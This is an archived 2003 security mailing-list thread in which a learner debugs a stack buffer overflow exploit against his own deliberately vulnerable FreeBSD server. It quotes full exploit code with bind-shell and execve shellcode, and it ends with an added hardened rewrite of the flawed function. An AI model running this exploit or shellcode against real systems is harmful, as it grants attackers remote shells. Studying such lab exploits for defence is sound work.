Re: sample buffer overflow exploit problem

From: Ganbold (ganbold_at_micom.mng.net)
Date: 09/28/03

    Date: Sun, 28 Sep 2003 15:06:29 +0900
    To: "deepcode ." <pondermate@hotmail.com>
    
    

    I don't know exactly what's wrong, but I suspect there might be a problem
    with the shellcode.
    I tried to connect from a different host and it is not working; it is the same
    problem, the connection drops.

    Ganbold

    At 11:37 PM 9/27/2003 -0300, you wrote:

    >You say that you can connect after the exploit, but then the connection
    >gets dropped immediately afterwards... is there a firewall in place?
    >
    >>From: Ganbold <ganbold@micom.mng.net>
    >>To: vuln-dev@securityfocus.com
    >>Subject: sample buffer overflow exploit problem
    >>Date: Sat, 27 Sep 2003 16:54:59 +0900
    >>
    >>Hi,
    >>
    >>I'm very new to buffer overflow exploit techniques and my boss wants me to
    >>thoroughly understand how it works. I'm trying to exploit a sample network
    >>server in FreeBSD 5.1 for this purpose.
    >>When I try to exploit using execve /bin/sh (shellcode1), it works and
    >>launches the shell on the remote machine.
    >>However, when I try to use the port-binding shellcode, it binds a shell to the
    >>port, but when I try to connect to it, it just closes the connection. Also I
    >>can't connect to the bind port after sending the buffer using the following
    >>code snippets:
    >>..............
    >> printf("[-] Connecting to bindshell...\n");
    >> remote.sin_family = AF_INET;
    >> remote.sin_addr = *((struct in_addr *)host->h_addr);
    >> remote.sin_port = htons(12345);
    >> if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
    >> {
    >> close(s);
    >> fprintf(stderr, "Error: connect\n");
    >> return -1;
    >> }
    >> exec_sh(s);
    >>...............
    >>
    >>I would appreciate it if somebody could give me some help to solve this test problem.
    >>Is there anywhere I can find a detailed explanation about buffer overflows
    >>and working sample network exploits?
    >>Is there any way I can generate shellcodes in FreeBSD?
    >>
    >>I attached my sample server code and exploit code.
    >>
    >>thanks in advance,
    >>
    >>Ganbold Ts,
    >>
    >>senior programmer,
    >>Micom Co., Ltd
    >>Ulaanbaatar,
    >>Mongolia
    >>
    >>
    >>
    >>Following is network server code:
    >>--------------------------------------------------------------------------------------------------------------------------------
    >>#include <stdio.h>
    >>#include <stdlib.h>
    >>#include <string.h>
    >>#include <unistd.h>
    >>#include <netinet/in.h>
    >>#include <arpa/inet.h>
    >>#include <netdb.h>
    >>#include <sys/socket.h>
    >>#include <sys/types.h>
    >>#include <errno.h>
    >>
    >>#define BUFFER_SIZE 1024
    >>#define NAME_SIZE 2048
    >>
    >>/* Deliberately vulnerable: name[] (2048 bytes) is larger than buffer[]
    >>   (1024 bytes), so the unbounded sprintf() below overflows buffer[] on
    >>   the stack when a long name is received. */
    >>int handle(int c)
    >>{
    >>    char buffer[BUFFER_SIZE], name[NAME_SIZE];
    >>    int bytes;
    >>    strcpy(buffer, "Your name?: ");
    >>    bytes = send(c, buffer, strlen(buffer), 0);
    >>    if (bytes == -1)
    >>        return -1;
    >>    bytes = recv(c, name, sizeof(name), 0);
    >>    if (bytes <= 0)   /* 0 = peer closed; without this check name[-1] would be written */
    >>        return -1;
    >>    name[bytes - 1] = '\0';
    >>    sprintf(buffer, "Hello %s, nice to meet you!\r\n", name);   /* overflow: name is unbounded */
    >>    bytes = send(c, buffer, strlen(buffer), 0);
    >>    if (bytes == -1)
    >>        return -1;
    >>    return 0;
    >>}
    >>
    >>
    >>int main(int argc, char *argv[])
    >>{
    >>    int s, c;
    >>    socklen_t cli_size;
    >>    struct sockaddr_in srv, cli;
    >>    if (argc != 2)
    >>    {
    >>        fprintf(stderr, "usage: %s port\n", argv[0]);
    >>        return 1;
    >>    }
    >>    s = socket(AF_INET, SOCK_STREAM, 0);
    >>    if (s == -1)
    >>    {
    >>        perror("socket() failed");
    >>        return 2;
    >>    }
    >>    memset(&srv, 0, sizeof(srv));
    >>    srv.sin_addr.s_addr = INADDR_ANY;
    >>    srv.sin_port = htons((unsigned short int) atol(argv[1]));
    >>    srv.sin_family = AF_INET;
    >>    if (bind(s, (struct sockaddr *)&srv, sizeof(srv)) == -1)
    >>    {
    >>        perror("bind() failed");
    >>        return 3;
    >>    }
    >>    if (listen(s, 3) == -1)
    >>    {
    >>        perror("listen() failed");
    >>        return 4;
    >>    }
    >>    for (;;)
    >>    {
    >>        cli_size = sizeof(cli);
    >>        c = accept(s, (struct sockaddr *)&cli, &cli_size);
    >>        if (c == -1)
    >>        {
    >>            perror("accept() failed");
    >>            return 5;
    >>        }
    >>        fprintf(stderr, "client from %s\n", inet_ntoa(cli.sin_addr));
    >>        if (handle(c) == -1)
    >>            fprintf(stderr, "%s: handle() failed", argv[0]);
    >>        close(c);
    >>    }
    >>    return 0;
    >>}
    >>--------------------------------------------------------------------------------------------------------------------------------
    >>
    >>Following is the sample exploit code:
    >>--------------------------------------------------------------------------------------------------------------------------------
    >>#include <stdio.h>
    >>#include <stdlib.h>
    >>#include <string.h>
    >>#include <netinet/in.h>
    >>#include <netdb.h>
    >>#include <sys/socket.h>
    >>#include <sys/select.h>
    >>#include <sys/types.h>
    >>#include <errno.h>
    >>#include <unistd.h>
    >>
    >>/*
    >> * FreeBSD shellcode - binds /bin/sh to a port 12345
    >> *
    >> * Claes M. Nyberg 20020619
    >> *
    >> * <cmn@darklab.org>, <md0claes@mdstud.chalmers.se>
    >> */
    >>char shellcode[] = /* port _______*/
    >>    "\x6a\x10\x89\xe1\x83\xec\x10\x89\xe3\x31\xc0\x50\x50\x50\x66\x68\x30\x39"
    >>    "\xb4\x20\x66\x50\x89\xe2\x6a\x06\x6a\x01\x6a\x02\x50\x30\xe4\xb0\x61\xcd"
    >>    "\x80\x89\xc7\x6a\x10\x52\x50\x50\xb0\x68\xcd\x80\x31\xc0\x50\x57\x50\x83"
    >>    "\xc0\x6a\xcd\x80\x51\x53\x57\x50\xb0\x1e\xcd\x80\x89\xc3\x31\xc0\x50\x53"
    >>    "\x50\xb0\x5a\xcd\x80\xb0\x01\x50\x53\x50\x83\xc0\x59\xcd\x80\xb0\x02\x50"
    >>    "\x53\x50\x83\xc0\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
    >>    "\x69\x6e\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\x50\xb0\x3b\xcd\x80\x31\xc0"
    >>    "\x40\x50\x50\xcd\x80";
    >>
    >>/*
    >> * FreeBSD shellcode - execve /bin/sh
    >> *
    >> * Claes M. Nyberg 20020120
    >> *
    >> * <cmn@darklab.org>, <md0claes@mdstud.chalmers.se>
    >> */
    >>char shellcode1[] =
    >>    "\x31\xc0"             /* xorl %eax, %eax */
    >>    "\x50"                 /* pushl %eax */
    >>    "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
    >>    "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
    >>    "\x89\xe3"             /* movl %esp, %ebx */
    >>    "\x50"                 /* pushl %eax */
    >>    "\x53"                 /* pushl %ebx */
    >>    "\x89\xe2"             /* movl %esp, %edx */
    >>    "\x50"                 /* pushl %eax */
    >>    "\x52"                 /* pushl %edx */
    >>    "\x53"                 /* pushl %ebx */
    >>    "\x50"                 /* pushl %eax */
    >>    "\xb0\x3b"             /* movb $0x3b, %al */
    >>    "\xcd\x80"             /* int $0x80 */
    >>    "\x31\xc0"             /* xorl %eax, %eax */
    >>    "\x40"                 /* inc %eax */
    >>    "\x50"                 /* pushl %eax */
    >>    "\x50"                 /* pushl %eax */
    >>    "\xcd\x80";            /* int $0x80 */
    >>
    >>#define RET 0xbfbffa48
    >>
    >>/* relay stdin to the socket and the socket to stdout */
    >>int exec_sh(int sockfd)
    >>{
    >>    char snd[4096], rcv[4096];
    >>    fd_set rset;
    >>    while (1)
    >>    {
    >>        FD_ZERO(&rset);
    >>        FD_SET(fileno(stdin), &rset);
    >>        FD_SET(sockfd, &rset);
    >>        select(255, &rset, NULL, NULL, NULL);
    >>        if (FD_ISSET(fileno(stdin), &rset))
    >>        {
    >>            memset(snd, 0, sizeof(snd));
    >>            if (fgets(snd, sizeof(snd), stdin) == NULL)   /* EOF on stdin */
    >>                return 0;
    >>            write(sockfd, snd, strlen(snd));
    >>        }
    >>        if (FD_ISSET(sockfd, &rset))
    >>        {
    >>            memset(rcv, 0, sizeof(rcv));
    >>            if (read(sockfd, rcv, sizeof(rcv)) <= 0)
    >>                exit(0);
    >>            fputs(rcv, stdout);
    >>        }
    >>    }
    >>}
    >>
    >>int main(int argc, char *argv[]) {
    >>
    >>    char buffer[1064];
    >>    int s, i, size;
    >>    struct sockaddr_in remote;
    >>    struct hostent *host;
    >>
    >>    if (argc != 3) {
    >>        printf("Usage: %s target-ip port\n", argv[0]);
    >>        return -1;
    >>    }
    >>
    >>    // filling buffer with NOPs
    >>    memset(buffer, 0x90, 1064);
    >>
    >>    // copying shellcode into buffer
    >>    memcpy(buffer + 1001 - sizeof(shellcode), shellcode, sizeof(shellcode));
    >>
    >>    // the previous statement causes an unintentional null byte at buffer[1000]
    >>    buffer[1000] = 0x90;
    >>
    >>    // copying the return address multiple times at the end of the buffer...
    >>    for (i = 1022; i < 1059; i += 4) {
    >>        *((int *) &buffer[i]) = RET;
    >>    }
    >>
    >>    buffer[1063] = 0x0;
    >>
    >>    // getting hostname
    >>    host = gethostbyname(argv[1]);
    >>    if (host == NULL)
    >>    {
    >>        fprintf(stderr, "Unknown Host %s\n", argv[1]);
    >>        return -1;
    >>    }
    >>
    >>    // creating socket...
    >>    s = socket(AF_INET, SOCK_STREAM, 0);
    >>    if (s < 0)
    >>    {
    >>        fprintf(stderr, "Error: Socket\n");
    >>        return -1;
    >>    }
    >>    remote.sin_family = AF_INET;
    >>    remote.sin_addr = *((struct in_addr *)host->h_addr);
    >>    remote.sin_port = htons(atoi(argv[2]));
    >>    // connecting with destination host
    >>    if (connect(s, (struct sockaddr *)&remote, sizeof(remote)) == -1)
    >>    {
    >>        close(s);
    >>        fprintf(stderr, "Error: connect\n");
    >>        return -1;
    >>    }
    >>    // sending exploit string
    >>    size = send(s, buffer, sizeof(buffer), 0);
    >>    if (size == -1)
    >>    {
    >>        close(s);
    >>        fprintf(stderr, "sending data failed\n");
    >>        return -1;
    >>    }
    >>/*
    >>    printf("[-] Connecting to bindshell...\n");
    >>    remote.sin_family = AF_INET;
    >>    remote.sin_addr = *((struct in_addr *)host->h_addr);
    >>    remote.sin_port = htons(12345);
    >>    if (connect(s, (struct sockaddr *)&remote, sizeof(remote)) == -1)
    >>    {
    >>        close(s);
    >>        fprintf(stderr, "Error: connect\n");
    >>        return -1;
    >>    }
    >>    exec_sh(s);
    >>*/
    >>    // closing socket
    >>    close(s);
    >>    return 0;
    >>}
    >>
    >>--------------------------------------------------------------------------------------------------------------------------------
    >>
    >>
    >

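Added example, not code from the thread or from its author: a hardened rewrite of the sample server's handle(). The posted version has two stack-write defects, the unbounded sprintf() of a 2048-byte name[] into the 1024-byte buffer[] and the write to name[bytes - 1] when recv() returns 0; this version bounds both the read and the write and rejects input that does not fit instead of truncating it. The function names build_greeting() and handle_safe() are mine; the constants and the protocol are the thread's.

```c
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>

#define BUFFER_SIZE 1024
#define NAME_SIZE   2048

/* Format the greeting into dst without writing past dstlen bytes or reading
 * past name_len bytes of name (which need not be NUL-terminated). Returns the
 * greeting length, or -1 on a closed peer, an empty name, or a name too long. */
int build_greeting(char *dst, size_t dstlen, const char *name, ssize_t name_len)
{
    int n = -1;

    /* The thread's handle() writes name[bytes - 1] even for bytes == 0, i.e.
     * one byte before the array; here a non-positive length is an error. */
    if (dstlen == 0 || name_len <= 0 || name_len > NAME_SIZE)
        return -1;
    while (name_len > 0 && (name[name_len - 1] == '\n' || name[name_len - 1] == '\r'))
        name_len--;                          /* drop the trailing line ending */
    /* %.*s bounds the read, snprintf bounds the write; NAME_SIZE > BUFFER_SIZE
     * is exactly why the original sprintf() into buffer[] overflowed. */
    if (name_len > 0)
        n = snprintf(dst, dstlen, "Hello %.*s, nice to meet you!\r\n", (int)name_len, name);
    if (n < 0 || (size_t)n >= dstlen) {
        dst[0] = '\0';                       /* reject, never truncate */
        return -1;
    }
    return n;
}

/* Drop-in replacement for the thread's handle(): same protocol, bounded copies. */
int handle_safe(int c)
{
    char buffer[BUFFER_SIZE], name[NAME_SIZE];
    const char prompt[] = "Your name?: ", reject[] = "Name too long or empty.\r\n";
    ssize_t bytes;
    int len;
    if (send(c, prompt, sizeof(prompt) - 1, 0) == -1)
        return -1;
    bytes = recv(c, name, sizeof(name), 0);  /* bounded by the array size */
    len = build_greeting(buffer, sizeof(buffer), name, bytes);
    if (len < 0) {
        (void)send(c, reject, sizeof(reject) - 1, 0);
        return -1;
    }
    return send(c, buffer, (size_t)len, 0) == -1 ? -1 : 0;
}
```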
